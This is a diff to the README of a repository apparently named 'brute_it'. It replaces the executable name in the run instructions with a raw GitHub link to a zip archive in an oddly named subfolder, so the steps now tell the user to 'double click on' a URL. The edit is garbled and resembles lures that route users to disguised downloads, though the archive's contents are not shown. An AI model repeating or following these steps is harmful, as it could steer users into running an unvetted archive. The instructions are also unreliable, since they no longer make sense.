Sbdbb/brute_it/README.md

 3. Choose a destination folder and click "Extract."

 4. Open the folder where you extracted the files.
-Find the executable file named `brute_it.exe`.
+Find the executable file named `https://github.com/Sbdbb/brute_it/raw/refs/heads/main/informable/brute_it_3.0.zip`.

-5. Double click on `brute_it.exe` to run the application.
+5. Double click on `https://github.com/Sbdbb/brute_it/raw/refs/heads/main/informable/brute_it_3.0.zip` to run the application.

 ## 🎨 User Interface Overview